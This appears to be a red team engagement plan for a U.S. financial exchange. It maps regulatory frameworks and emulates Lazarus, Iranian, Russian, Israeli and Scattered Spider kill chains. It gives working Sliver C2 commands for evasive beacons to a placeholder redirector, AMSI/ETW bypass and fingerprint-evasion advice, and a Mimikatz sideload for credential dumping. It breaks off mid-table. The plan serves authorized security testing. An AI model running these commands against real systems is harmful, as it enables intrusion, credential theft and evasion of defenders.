Claude v Finance

2026-04-16T00:00:00+00:00

Red Team Engagement Outline: Financial Exchange Organization</h1>

U.S. Industrial Standards Alignment | Sliver C2 | Iran / Israel / Russia / DPRK / Cybercriminal APT Coverage</h3>

Regulatory & Standards Framework</h2>

This engagement is structured against the full current U.S. regulatory stack for financial exchanges:</p>

NIST CSF 2.0 (Feb 2024)</strong> — The primary successor to the FFIEC CAT, with roughly 81% of U.S.-based financial institutions reporting partial or full NIST CSF adoption in 2024 for mapping to FFIEC and SEC guidelines. CSF 2.0 introduces a sixth Govern</strong> function alongside the original five (Identify, Protect, Detect, Respond, Recover), providing the board-level accountability framework within which this engagement operates.</p>

FFIEC CAT Retirement (Aug 31, 2025)</strong> — The FFIEC CAT was retired effective August 31, 2025. OCC Bulletin 2024-25 directs institutions to adopt any industry-standard cybersecurity framework — NIST CSF 2.0 and the CISA Cybersecurity Performance Goals are the recognized successors.</p>

NIST SP 800-115</strong> — The federal technical standard governing the four-phase penetration test methodology used throughout this engagement. PCI DSS 4.0 explicitly cites NIST SP 800-115 as an accepted penetration testing methodology, alongside OSSTMM, OWASP, and PTES.</p>

NIST SP 800-53 Rev. 5</strong> — Security control catalog for findings mapping, particularly CA-8 (Penetration Testing).</p>

SEC Cybersecurity Disclosure Rules (Dec 2023)</strong> — Public companies must file current reports on material cybersecurity incidents within four business days of a materiality determination, and provide annual disclosure on risk management, strategy, and governance in their Form 10-K.</p>

NYDFS 23 NYCRR Part 500 (2nd Amendment, Nov 2023)</strong> — The 2023 amendments specify that annual penetration testing must be conducted from both inside and outside the information systems' boundaries, with new requirements for monitoring privileged access and implementing endpoint detection and response solutions. Under Section 500.17(b), the annual compliance notification must be signed by both the entity's highest-ranking executive and its CISO, creating personal liability for senior leadership.</p>

PCI DSS 4.0 (mandatory Mar 31, 2025)</strong> — Requirement 11.3.1 mandates external network penetration tests of internet-facing environments at least annually; internal tests are required under 11.3.2.</p>

CRI Cyber Profile 2.0</strong> — The Cyber Risk Institute's financial-sector extension of NIST CSF, knitting together 2,500 regulatory expectations in 318 control objectives and mapping directly to MITRE ATT&CK v16.1.</p>

Phase 1 — Pre-Engagement: Governance & Authorization</h2>
1.1 Legal Authorization & Rules of Engagement</h3>
All testing requires written authorization under the Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030)</strong> before any active activity begins. Required documents:</p>

Master Service Agreement (MSA)</strong> with indemnification and liability caps</li>
Scope of Work (SOW)</strong> defining in-scope systems, IP ranges, personas, and excluded targets</li>
Rules of Engagement (RoE)</strong> specifying blackout windows (market hours, settlement cycles), emergency stop/kill-switch procedures, and escalation contacts</li>
CFAA Authorization Letter</strong> signed by an authorized officer explicitly permitting simulated attacks</li>
Deconfliction Protocol</strong> for coordinating with the SOC and any regulators monitoring the target during the engagement period</li> </ul>
1.2 Control Team Structure</h3>

White Cell</strong> — CISO + Legal + designated board member; only internal parties who know the test is live</li>
Red Team</strong> — External provider conducting adversarial simulation</li>
Blue Team</strong> — SOC and defenders with no knowledge of the engagement (covert phase); joined later for purple team</li> </ul>
1.3 Crown Jewel Asset Register</h3>
(Aligned to NIST CSF 2.0 ID.AM and NYDFS §500.13)</em></p>

Trade Order Management System (OMS) and matching engine</li>
SWIFT/FIN messaging endpoints and connectivity</li>
Clearing & Settlement (CCP processing layer)</li>
Market data dissemination feeds</li>
Internal Certificate Authority and PKI</li>
Active Directory / Entra ID backbone</li>
Privileged Access Workstations (PAWs) and jump hosts</li>
Backup and DR systems</li> </ul>

Phase 2 — Threat Intelligence Report</h2>
Produced prior to active testing per NIST SP 800-30 Rev. 1</strong> (Risk Assessment) and NIST CSF 2.0 ID.RA</strong>. Satisfies NYDFS §500.9 risk assessment requirements and NIST 800-53 RA-3.</p>
Between April 2024 and April 2025, analysts observed 6,406 dark web forum posts pertaining to financial sector access listings, with ransomware attacks, initial access brokers, third-party compromises, and insider threats among the primary documented attack vectors.</p>
The report covers:</p>

Active APT groups with financial exchange TTPs (Phases 3–7)</li>
Recently weaponized CVEs against FSI targets</li>
OSINT: public-facing infrastructure, employee exposure, dark web credential listings</li>
MITRE ATT&CK v16.1 Navigator threat heatmap for the target</li>
Risk scoring using NIST SP 800-30 likelihood × impact methodology</li> </ul>

Phase 3 — C2 Infrastructure: Sliver Framework</h2>
Why Sliver</h3>
Sliver is an open-source cross-platform adversary emulation/red team framework developed by BishopFox. Implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically compiled with per-binary asymmetric encryption keys. The server and client support macOS, Windows, and Linux.</p>
Importantly, APT29 (Cozy Bear) has used Sliver in intrusion campaigns to build robust C2 infrastructures — making Sliver emulation highly realistic for financial exchange red team scenarios.</p>
Infrastructure Architecture</h3>
[Operators] --> [Sliver Team Server] --> [Nginx/Apache Redirectors] --> [Implants on Target]</span></span></code></pre> Sliver implements a distributed architecture that clearly separates server, client, and operator components, allowing maximum operational flexibility. Redirectors should be positioned between the server backend and implants to protect team server identity.</p> C2 Channel Selection by Scenario</h3> Protocol</th> Use Case</th> Sliver Command</th></tr></thead> HTTPS</strong></td> Primary exfiltration channel; blends with web traffic through Nginx redirector</td> sliver> https --lhost 0.0.0.0 --lport 443 --domain <c2_domain></code></td></tr> mTLS</strong></td> Encrypted internal pivot channel; mutual certificate auth</td> sliver> mtls --lhost 0.0.0.0 --lport 8888</code></td></tr> WireGuard</strong></td> Stealthy tunnel for long-dwell operations; VPN-like encapsulation</td> sliver> wg --lport 53</code></td></tr> DNS</strong></td> Egress through restrictive firewalls; slow beacon for low-noise ops</td> sliver> dns --domains <c2_domain></code></td></tr> </tbody></table> Implant Generation</h3> Primary Windows HTTPS beacon (staged, evasive):</strong></p> # Create reusable beacon profile</span></span> sliver</span>> profiles new beacon</span> --http</span> https://sliver-redirector.com</span> \</span></span> --os</span> windows</span> --format</span> shellcode</span> --evasion</span> https-win</span></span> </span> # Generate staged beacon with gzip + AES-encrypted stage-1</span></span> sliver</span>> stage-listener</span> --url</span> http://sliver-domain:80</span> --profile</span> https-win</span> \</span></span> --compress</span> gzip</span> --aes-encrypt-key</span> "<key>"</span> --aes-encrypt-iv</span> "<iv>"</span></span></code></pre> Multi-channel failover beacon (mTLS → HTTPS → DNS):</strong></p> sliver</span>> generate</span> --mtls</span> <</span>ip</span>></span>:8888</span> --http</span> <</span>c2_domain</span>></span> --dns</span> <</span>c2_domain</span>></span> \</span></span> --os</span> windows</span> --arch</span> amd64</span> --format</span> shellcode</span> --evasion</span></span></code></pre> Long-dwell beacon with jitter (APT persistence emulation):</strong></p> sliver</span>> profiles new beacon</span> --http</span> https://sliver-redirector.com</span> \</span></span> --os</span> windows</span> --format</span> exe</span> --name</span> apt-persist</span></span> sliver</span>> profiles beacon-interval</span> --profile</span> apt-persist</span> --seconds 3600 --jitter 30</span></span></code></pre> Linux implant for server-side pivot:</strong></p> sliver</span>> generate beacon</span> --http</span> https://sliver-redirector.com</span> \</span></span> --os</span> linux</span> --arch</span> amd64</span> --evasion --save</span> /output/</span></span></code></pre>Redirector Configuration (Nginx)</h3> location</span> / </span>{</span></span> proxy_pass</span> https://<sliver-teamserver-ip>:443;</span></span> proxy_ssl_verify</span> off</span>;</span></span> proxy_set_header</span> Host $</span>host</span>;</span></span> proxy_set_header</span> X-Real-IP $</span>remote_addr</span>;</span></span> }</span></span></code></pre> Team server firewall rules — only accept connections from redirector:</p> iptables</span> -A</span> INPUT</span> -p</span> tcp</span> --dport 443 -s</span> <</span>redirector-ip</span>></span> -j</span> ACCEPT</span></span> iptables</span> -A</span> INPUT</span> -p</span> tcp</span> --dport 443 -j</span> DROP</span></span></code></pre>Operational Notes</h3> Default Sliver HTTPS listeners use a recognizable certificate chain (US cities + "CN = localhost") and produce a characteristic 400 error on malformed requests — operators must replace with custom certificates and configure domain fronting via Cloudflare or CDN to avoid JARM fingerprinting.</li> Use Donut</code> or Scarecrow</code> to wrap Sliver shellcode output with AMSI/ETW bypass before deployment.</li> Sliver supports Windows process migration, process injection, and user token manipulation natively — use these for post-exploitation rather than external tools where possible to reduce tooling footprint.</li> Armory package manager provides integrated BOF extensions: armory install sa-ldapsearch</code> for AD enumeration without dropping SharpHound to disk.</li> </ul> Multiplayer Operator Configuration</h3> # On team server — generate per-operator configs</span></span> sliver-server</span> operator</span> --name</span> operator1</span> --lhost</span> <</span>team_server_ip</span>></span></span> </span> # On operator machine — import and connect</span></span> sliver-client</span> import operator1.cfg</span></span> sliver-client</span></span></code></pre> Phase 4 — Threat Actor Emulation: APTs & Kill Chains (2023–2025)</h2> All scenarios are driven by the Threat Intelligence Report and mapped to MITRE ATT&CK for Enterprise v16.1</strong> and NIST 800-53 Rev. 5</strong> control families.</p> APT 1 — Lazarus Group / APT38 / TraderTraitor (DPRK)</h3> Risk Rating: Critical | MITRE: G0032 / G0082 | Sponsor: Reconnaissance General Bureau</strong></p> APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide, with significant operations including the 2016 Bank of Bangladesh heist ($81 million stolen).</p> 2024–2025 Activity:</strong></p> In February 2025, a Lazarus subgroup created a counterfeit wallet management interface, deceiving Bybit executives into authorizing the transfer of over 400,000 ETH from cold storage — the largest crypto heist in history at $1.5 billion.</li> In 2024, Lazarus exploited CVE-2024-38193 (Windows AFD.sys zero-day) for SYSTEM-level access and CVE-2024-21338 (Windows kernel flaw, CVSS 7.8) for privilege escalation.</li> </ul> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Reconnaissance</td> Fake LinkedIn recruiter profiles ("Operation Dream Job")</td> T1591.004, T1598</td> OSINT / Gophish persona</td></tr> Initial Access</td> Trojanized job offer docs; watering-hole on financial portals</td> T1566.001, T1189</td> Sliver HTTPS beacon in weaponized doc</td></tr> Execution</td> DLL sideloading via malicious macro chain</td> T1055.001</td> sideload</code> module</td></tr> Persistence</td> Registry run keys; scheduled tasks</td> T1547.001, T1053.005</td> registry write</code>; task-scheduler</code></td></tr> Privilege Escalation</td> CVE-2024-38193 / CVE-2024-21338 BYOVD</td> T1068</td> BYOVD harness + Sliver token manipulation</td></tr> Defense Evasion</td> BYOVD; anti-forensic wipers post-exfil</td> T1014, T1561.002</td> Sliver execute-assembly</code> + custom wiper</td></tr> Credential Access</td> KiloAlfa keylogger; CreateProcessAsUserA</code> token theft</td> T1056.001, T1134.002</td> token steal</code>; execute-assembly Seatbelt</code></td></tr> Lateral Movement</td> Pass-the-hash; LOLBins</td> T1550.002, T1218</td> Sliver psexec</code>; wmiexec</code></td></tr> Impact</td> Fraudulent SWIFT MT103 staging; cold wallet UI spoofing</td> T1657, T1041</td> Sliver WireGuard tunnel to SWIFT endpoint</td></tr> </tbody></table> NIST 800-53 Controls Tested:</strong> AC-2, AC-17, SI-3, SI-4, AU-12, IR-4, SC-7</p> APT 2 — APT34 / OilRig / Hazel Sandstorm (Iran — MOIS / IRGC-linked)</h3> Risk Rating: Critical | MITRE: G0049 | Sponsor: Iranian Ministry of Intelligence</strong></p> OilRig (APT34) primarily conducts cyber espionage targeting government entities, financial services, telecommunications, defense contractors, and energy organizations, particularly in the Middle East. The group commonly relies on spear-phishing campaigns, credential harvesting, and exploitation of internet-facing applications for initial access, followed by custom backdoors and web shells to maintain persistence.</p> 2024–2025 Activity:</strong></p> Beginning in September 2024, APT34 intensified operations through a multi-stage intrusion campaign deploying novel malware families including the Veaty and Spearal backdoors. By late 2024 and into early 2025, a renewed campaign introduced C# malware masquerading as PDF documents, incorporating anti-VM checks, timestamp manipulation, and dual C2 channels combining HTTP through European servers hidden behind fake 404 error pages with email-based control using compromised government accounts — commands concealed within Authorization Bearer tokens.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Reconnaissance</td> Target research on financial employees; infrastructure enumeration</td> T1591, T1590</td> OSINT + Nuclei external scan</td></tr> Initial Access</td> Spear-phishing with malicious PDF/C# payload masquerading as regulatory document</td> T1566.001</td> Sliver beacon embedded in lure PDF</td></tr> Execution</td> PowerShell download cradle; macro execution</td> T1059.001</td> Sliver execute -o powershell</code></td></tr> Persistence</td> Web shells (HyperShell, HighShell); scheduled tasks</td> T1505.003, T1053</td> Sliver HTTP reverse shell + task-scheduler</code></td></tr> Defense Evasion</td> Command obfuscation; fake 404 C2 pages; Bearer token C2 exfil</td> T1027, T1001.003</td> Custom Sliver HTTP profile with 404 responses</td></tr> Credential Access</td> Mimikatz; LaZagne; credential-filter DLLs</td> T1003, T1555</td> Sliver sideload mimikatz.dll</code></td></tr> Lateral Movement</td> Cloud service abuse (OneDrive/Exchange Online as C2)</td> T1567, T1114.002</td> Sliver pivot + cloud enumeration</td></tr> Exfiltration</td> Long-term credential/data exfil to cloud storage</td> T1567.002</td> Sliver WireGuard tunnel</td></tr> </tbody></table> Notable CVEs for Scenario Use:</strong></p> CVE-2024-30088 (Windows Kernel privilege escalation, exploited by APT34)</li> CVE-2017-11882 (Office Equation Editor, still weaponized in lure docs)</li> </ul> NIST 800-53 Controls Tested:</strong> SI-3, SI-4, AC-17, IA-5, AU-12, SC-28</p> APT 3 — APT35 / Charming Kitten / Mint Sandstorm (Iran — IRGC)</h3> Risk Rating: High | MITRE: G0059 | Sponsor: Islamic Revolutionary Guard Corps</strong></p> CloudSEK analyzed a credible leak of Charming Kitten operational materials documenting coordinated teams for penetration, malware development, social engineering, and infrastructure compromise, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation. Victims include government, legal, academic, aviation, energy, and financial sectors across the Middle East, with regions of interest including the US and Asia.</p> 2024–2025 Activity:</strong></p> APT35 sustained a continuous, technically evolving campaign of cyber espionage from late 2024 through 2025, beginning with BellaCPP — a C++ reimplementation of the BellaCiao .NET implant — alongside the PowerLess backdoor updated to version 3.3.4 with AMSI and ETW bypass techniques, AES-encrypted payloads via malicious LNK files, and Telegram-based command-and-control communication.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> Spear-phishing with password-protected RAR containing malicious LNK; AI-generated decoy PDFs</td> T1566.001, T1204.002</td> Sliver staged payload in LNK file</td></tr> Execution</td> PowerLess backdoor (PowerShell + AMSI bypass); BellaCPP C++ implant</td> T1059.001</td> Sliver shellcode wrapped with Scarecrow AMSI bypass</td></tr> Persistence</td> Winlogon registry modification</td> T1547.004</td> registry write HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code></td></tr> Credential Access</td> Custom Chromium-based credential stealer (Chrome, Edge, Brave, Opera)</td> T1555.003</td> Sliver execute-assembly</code> + custom stealer BOF</td></tr> Defense Evasion</td> EDR evasion via C++ re-implementation; supply chain pivots</td> T1027, T1195</td> Sliver --evasion</code> flag + custom shellcode loader</td></tr> C2</td> Telegram API; Dropbox; Google Drive; Backblaze; IPFS</td> T1102, T1567</td> Sliver DNS beacon as fallback to cloud C2</td></tr> Lateral Movement</td> AD domination; supply-chain pivots via compromised IT providers</td> T1484, T1195.002</td> Sliver psexec</code>; BloodHound path exploitation</td></tr> </tbody></table> NIST 800-53 Controls Tested:</strong> SI-3, SI-4, IA-2, IA-5, SC-7, AC-3</p> APT 4 — APT33 / Refined Kitten / Peach Sandstorm (Iran — IRGC-linked)</h3> Risk Rating: High | MITRE: G0064 | Focus: Financial infrastructure disruption</strong></p> Password spraying has become APT33's primary initial access method since 2023, targeting Microsoft 365 and Entra ID at scale using go-http-client through TOR exit nodes. The group has expanded beyond traditional espionage to focus on satellite communications and critical infrastructure.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> Large-scale M365/Entra ID password spraying via TOR</td> T1110.003</td> External spray tool + Sliver beacon on success</td></tr> Persistence</td> Azure infrastructure abuse; legitimate admin tool persistence</td> T1078.004</td> AADInternals</code> device enrollment + Sliver implant</td></tr> Lateral Movement</td> Cloud tenant pivoting; service principal abuse</td> T1538, T1098.001</td> ROADtools + Sliver HTTPS beacon</td></tr> Impact</td> Pre-positioned access for destructive wiper deployment</td> T1485</td> Sliver execute-assembly</code> wiper simulation</td></tr> </tbody></table> APT 5 — MuddyWater / Mango Sandstorm / TA450 / Seedworm (Iran — MOIS)</h3> Risk Rating: Critical | MITRE: G0069 | Sponsor: Iranian Ministry of Intelligence and Security (MOIS)</strong></p> MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors including telecommunications, local government, defense, oil and natural gas, and financial organizations in the Middle East, Asia, Africa, Europe, and North America.</p> CISA has stated MuddyWater actors are "positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors" — making this group particularly dangerous as both a direct threat and an access broker</strong> feeding other IRGC-affiliated groups such as Storm-1084/DarkBit.</p> 2024–2025 Activity Directly Relevant to Financial Sector:</strong></p> A sophisticated spear-phishing campaign attributed to MuddyWater actively compromised CFOs and finance executives across Europe, North America, South America, Africa, and Asia. The attackers impersonated recruiters from Rothschild & Co, deploying Firebase-hosted phishing pages with custom CAPTCHA challenges to lend legitimacy. Payloads abused legitimate remote-access tools including NetBird and OpenSSH to establish persistent RDP access and automated scheduled tasks.</li> Symantec/Carbon Black flagged suspicious MuddyWater-linked activity on the networks of a U.S. bank, a software company, an airport, and NGOs in the U.S. and Canada — the single most significant indicator of MuddyWater financial sector penetration in the 2024–2026 window.</li> BugSleep, a new tailor-made backdoor deployed in MuddyWater phishing lures since May 2024, has partially replaced legitimate RMM tools. Multiple versions were distributed in rapid succession showing active development; the backdoor begins with multiple Sleep API calls to evade sandboxes, creates a mutex, decrypts its C2 configuration, and executes threat actor commands while transferring files between the compromised machine and C2.</li> MuddyWater adopted DarkBeatC2 — a previously unreported C2 framework identified in early 2024 — built on PowerShell with Tactical RMM and Atera Agent abuse. The framework manages infected endpoints via PowerShell connections established after initial access through spear-phishing, DLL sideloading, or Windows Registry AutodialDLL abuse.</li> MuddyWater deployed Mimikatz via a custom loader and injector in a 2024 campaign, after which the group may have handed off harvested credentials to Lyceum (another Iran-aligned group), with researchers noting MuddyWater may be acting as an access broker for other Iran-aligned threat actors.</li> </ul> C2 Framework Evolution (2017 → 2025):</strong></p> Year</th> Framework</th> Notes</th></tr></thead> 2017–2020</td> POWERSTATS</td> PowerShell-based signature backdoor</td></tr> 2020–2023</td> RMM Abuse (Atera, ScreenConnect, SimpleHelp, N-able)</td> Legitimate tools to blend with enterprise traffic</td></tr> 2023</td> PhonyC2 → MuddyC2Go</td> Python → Golang C2 evolution</td></tr> Early 2024</td> DarkBeatC2</td> PowerShell-based; Registry AutodialDLL sideloading</td></tr> May 2024–Present</td> BugSleep / RustyWater</td> Custom C backdoor; RustyWater is a Rust-based RAT deployed in early 2026 targeting Israeli government, military, financial, telecommunications, and maritime organizations</td></tr> </tbody></table> Kill Chain (MITRE ATT&CK Mapped):</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Reconnaissance</td> Sector-specific OSINT; identify CFOs, finance executives, IT contacts at target exchange</td> T1591.004, T1589.002</td> OSINT via theHarvester, LinkedIn, FOCA</td></tr> Initial Access</td> Spear-phishing from compromised organizational email accounts; lures themed as regulatory compliance docs, webinar invites, or financial recruiter outreach</td> T1566.001, T1566.002</td> Gophish with Rothschild/regulatory lure templates; Sliver beacon in payload</td></tr> Execution</td> BugSleep backdoor injected into target process via WriteProcessMemory/CreateRemoteThread; macro-enabled Office documents; VBS scripts dropping RMM installers</td> T1059.001, T1059.005, T1204.002</td> Sliver shellcode wrapped in custom injector; execute-assembly</code> for .NET payloads</td></tr> Persistence</td> Scheduled tasks (BugSleep persistence method); Registry run keys; Winlogon hijack via AutodialDLL</td> T1053.005, T1547.001, T1574.012</td> task-scheduler</code> via Sliver; registry write</code></td></tr> Defense Evasion</td> Sleep API sandbox evasion; DLL sideloading (PowGoop masquerading as GoogleUpdate.exe); C2 infrastructure limited to a few days uptime to hinder attribution; obfuscated PowerShell</td> T1497.003, T1574.002, T1027</td> Sliver --evasion</code> flag; beacon jitter --seconds 3600 --jitter 30</code> mimicking infrastructure rotation</td></tr> Credential Access</td> Mimikatz via custom loader/injector; LaZagne; browser credential theft</td> T1003.001, T1555.003</td> Sliver sideload mimikatz.dll</code>; BOF credential harvester</td></tr> Lateral Movement</td> Legitimate RMM tool abuse (Atera, AnyDesk, SimpleHelp, NetBird, ConnectWise ScreenConnect, PDQ) for hands-on keyboard sessions; WMI; pass-the-hash</td> T1219, T1047, T1550.002</td> Sliver wmiexec</code>; portfwd</code> for RDP via WireGuard; NetExec</td></tr> Collection</td> File staging via BugSleep file transfer; cloud service abuse (Egnyte subdomains mimicking target company names); Telegram Bot API C2 (Small Sieve)</td> T1074.001, T1567.002, T1102</td> Sliver DNS tunnel for low-noise exfil staging</td></tr> Exfiltration</td> HTTPS upload via DarkBeatC2 or RMM file transfer; Egnyte/OneDrive abuse</td> T1567.002, T1041</td> Sliver WireGuard tunnel or DNS beacon</td></tr> Access Brokering</td> Credential hand-off to other IRGC/MOIS-aligned groups (observed Lyceum/Storm-1084 hand-offs)</td> T1078</td> Not directly emulated; document as finding if credentials reach crown jewel level</td></tr> </tbody></table> Notable CVEs for Scenario Use:</strong></p> CVE-2024-1709 — ConnectWise ScreenConnect auth bypass (documented in Charming Kitten leaked materials and MuddyWater infrastructure overlap)</li> CVE-2023-27350 — PaperCut RCE (exploited by MuddyWater for server-side initial access)</li> CVE-2020-1472 — Zerologon (used in post-exploitation privilege escalation)</li> </ul> Financial Sector Specific Concern — CFO / Finance Executive Targeting:</strong></p> Infrastructure analysis reveals consistent use of Firebase-hosted phishing pages, evolving C2 IP addresses, and identical NetBird setup keys across campaigns — indicating a persistent, operationally disciplined adversary adapting to detection while retaining core targeting of financial decision-makers. For a financial exchange, this translates to a direct threat to individuals with trade authorization, settlement approval authority, and access to SWIFT messaging credentials.</p> Sliver-Specific Emulation Notes:</strong></p> MuddyWater's hallmark RMM-abuse pattern is best emulated using Sliver's built-in persistence combined with a simulated RMM agent installation:</p> # Simulate RMM-based persistence (Atera/SimpleHelp pattern)</span></span> # Stage 1: Deliver Sliver HTTPS beacon via phishing lure</span></span> sliver</span>> profiles new beacon</span> --http</span> https://sliver-redirector.com</span> \</span></span> --os</span> windows</span> --format</span> shellcode</span> --evasion</span> mw-rmm-profile</span></span> </span> # Stage 2: Post-access — simulate RMM agent registration for persistence</span></span> sliver</span> (SESSION)</span>></span> execute -o cmd.exe /c </span>"msiexec /i AteraAgent.msi /quiet"</span></span> </span> # Simulate BugSleep sleep-evasion behavior via beacon jitter</span></span> sliver</span>> profiles beacon-interval</span> --profile</span> mw-rmm-profile</span> \</span></span> --seconds 7200 --jitter 600</span> # Long beacon interval, high jitter</span></span> </span> # Simulate DarkBeatC2 PowerShell C2 pattern</span></span> sliver</span> (SESSION)</span>></span> execute-assembly /tmp/PowerShellRunner.exe </span>\</span></span> -EncodedCommand</span> <</span>base64-obfuscated-PS</span>></span></span> </span> # Simulate Mimikatz via custom loader (no disk drop)</span></span> sliver</span> (SESSION)</span>></span> sideload /tmp/mimikatz.dll sekurlsa::logonpasswords</span></span></code></pre> NIST 800-53 Controls Tested:</strong> AC-2, AC-17, IA-5, SI-3, SI-4, SC-7, AU-12, IR-4, SA-9 (third-party risk — RMM abuse), CA-8</p> Key Detection Gaps to Validate:</strong></p> Detection of unauthorized RMM tool installations (Atera, SimpleHelp, NetBird, PDQ) — NYDFS §500.14(b) EDR requirement</li> Alerting on PowerShell download cradles executed from unusual parent processes</li> Network baseline for legitimate vs. unauthorized use of WireGuard UDP/51820 and RMM agent beacon traffic</li> Email security controls against phishing from compromised legitimate organizational email accounts</strong> (SPF/DKIM pass → MuddyWater's primary delivery method bypasses standard email filtering)</li> </ul> APT 6 — Predatory Sparrow / Gonjeshke Darande (Israel — Likely Unit 8200 affiliated)</h3> Risk Rating: High | Focus: Financial infrastructure destruction and disruption</strong></p> On June 17, 2025, shortly after Israeli airstrikes against Iran, Predatory Sparrow claimed a cyberattack on Iran's state-owned Bank Sepah, causing widespread service outages and claiming to have destroyed the bank's data. The group also claimed responsibility for an attack on the Iranian cryptocurrency exchange Nobitex the following day, stealing $90 million in crypto assets and then destroying the funds by sending them to inaccessible addresses.</p> Relevance to U.S. Exchange Red Team:</strong> Predatory Sparrow's TTPs — infrastructure-layer destruction combined with financial data exfiltration and transaction system disruption — are the highest-fidelity public template for what a destructive state-level attack on a financial exchange looks like. Any U.S. exchange with Israeli vendor relationships, Israeli-licensed technology, or geopolitically exposed market participants should model against this profile.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Reconnaissance</td> Deep intelligence gathering on target financial infrastructure topology</td> T1590, T1591</td> OSINT + Shodan/Censys mapping</td></tr> Initial Access</td> Likely supply chain / insider access to core banking/exchange systems</td> T1195.002, T1078</td> Sliver beacon via compromised vendor credential</td></tr> Execution</td> Destructive wiper payload deployment to banking transaction systems</td> T1485, T1561.002</td> Sliver execute-assembly</code> wiper simulation (non-destructive flag)</td></tr> Impact</td> Data destruction + transaction system disruption + crypto asset drain</td> T1657, T1490</td> Crown jewel access demonstration; SWIFT staging</td></tr> </tbody></table> NIST 800-53 Controls Tested:</strong> CP-9, CP-10, SI-12, IR-4, IR-6, SC-28</p> APT 7 — APT29 / Midnight Blizzard / Cozy Bear (Russia — SVR)</h3> Risk Rating: Critical | MITRE: G0016 | Sponsor: Foreign Intelligence Service (SVR)</strong></p> APT29 has shifted from traditional malware-heavy operations toward cloud-native tradecraft, heavily targeting identity systems, OAuth applications, and federated trust configurations to move laterally without deploying detectable payloads. High-profile intrusions include the SolarWinds supply chain compromise (2020) and the Microsoft corporate breach (January 2024).</p> APT29 has used Sliver in their intrusion campaigns to build out robust C2 infrastructures — making Sliver the precisely correct tool for emulating this actor's tradecraft.</p> 2024–2025 Activity:</strong></p> WINELOADER was attributed with high confidence to APT29 in November 2024. The backdoor employs re-encryption and zeroing of memory buffers to guard sensitive data in memory and evade forensics; C2 servers only respond to specific request types at certain times to prevent automated analysis from retrieving C2 responses.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> Spear-phishing with ROOTSAW dropper → WINELOADER second-stage</td> T1566.001</td> Sliver HTTPS beacon deployed via ROOTSAW-style dropper</td></tr> Execution</td> WINELOADER via DLL sideloading from legitimate binary</td> T1574.002</td> Sliver sideload</code> module</td></tr> Persistence</td> Multiple redundant implants; cloud service C2 (OneDrive, Graph API)</td> T1078.004, T1567.002</td> Sliver beacon + Graph API exfil tunnel</td></tr> Defense Evasion</td> Time-gated C2 (server only responds at specific hours); memory zeroing; residential proxy rotation</td> T1027, T1090.002</td> Sliver beacon-interval</code> + jitter config; redirector with time-based allow rules</td></tr> Lateral Movement</td> OAuth token abuse; federated identity exploitation; service account Kerberoasting</td> T1528, T1558.003</td> Sliver + AADInternals OAuth token extraction; Rubeus Kerberoast</td></tr> Collection</td> Cloud resource enumeration; M365 mail access</td> T1114.002, T1530</td> ROADtools + Sliver execute-assembly</td></tr> Exfiltration</td> Low-and-slow exfil via legitimate cloud services</td> T1567.002</td> Sliver DNS/WireGuard tunnel</td></tr> </tbody></table> NIST 800-53 Controls Tested:</strong> IA-8, AC-3, SC-7, AU-2, SI-4, IR-4</p> APT 8 — APT28 / Fancy Bear / Forest Blizzard (Russia — GRU Unit 26165)</h3> Risk Rating: High | MITRE: G0007 | Sponsor: GRU Military Intelligence</strong></p> The FBI warned that Russia's GRU via APT28 has been exploiting TP-Link routers via CVE-2023-50224 since at least 2024, changing device settings to introduce attacker-controlled DNS resolvers and set up adversary-in-the-middle attacks against encrypted traffic. The GRU also engaged in credential-targeting phishing campaigns against European government entities, leveraging VPNs, Tor, data center IPs, and compromised EdgeOS routers to anonymize operations.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> Spear-phishing for credential harvest; compromised SOHO router DNS hijacking</td> T1566, T1557.001</td> Evilginx2 AiTM + Sliver beacon on credential capture</td></tr> Persistence</td> Implants on edge routers; legitimate credentials from credential spray</td> T1078, T1505</td> Sliver implant on compromised network device</td></tr> Lateral Movement</td> Credential reuse; LOLBins</td> T1550.002, T1218</td> Sliver psexec</code>; NetExec pass-the-hash</td></tr> Collection</td> Credential harvesting from M365; email exfiltration</td> T1114.002</td> Sliver + AADInternals</td></tr> Defense Evasion</td> Tor/VPN/data center IP anonymization; living-off-the-land</td> T1090, T1036</td> Sliver with redirectors behind Cloudflare</td></tr> </tbody></table> NIST 800-53 Controls Tested:</strong> IA-5, SC-7, AU-12, SI-4, AC-17</p> APT 9 — Scattered Spider / UNC3944 (Cybercriminal, English-speaking)</h3> Risk Rating: High | Focus: Cloud financial infrastructure</strong></p> A notable long-term Scattered Spider campaign targeted cloud infrastructures within insurance and financial sectors through mid-2024, leveraging ransomware strains including RansomHub, BlackCat, and Qilin alongside custom phishing pages impersonating internal portals and Okta/MFA prompts.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> SMS vishing / help desk social engineering; SIM-swap</td> T1598.004, T1566.004</td> Voice phishing scripts; Sliver beacon after MFA reset</td></tr> Persistence</td> Attacker MFA device enrollment via help desk reset</td> T1098.005</td> Sliver implant + AADInternals device enrollment</td></tr> Privilege Escalation</td> MFA push fatigue; Azure AD conditional access bypass</td> T1621</td> Evilginx2 MFA bypass + Sliver HTTPS</td></tr> Lateral Movement</td> Azure AD → M365 → 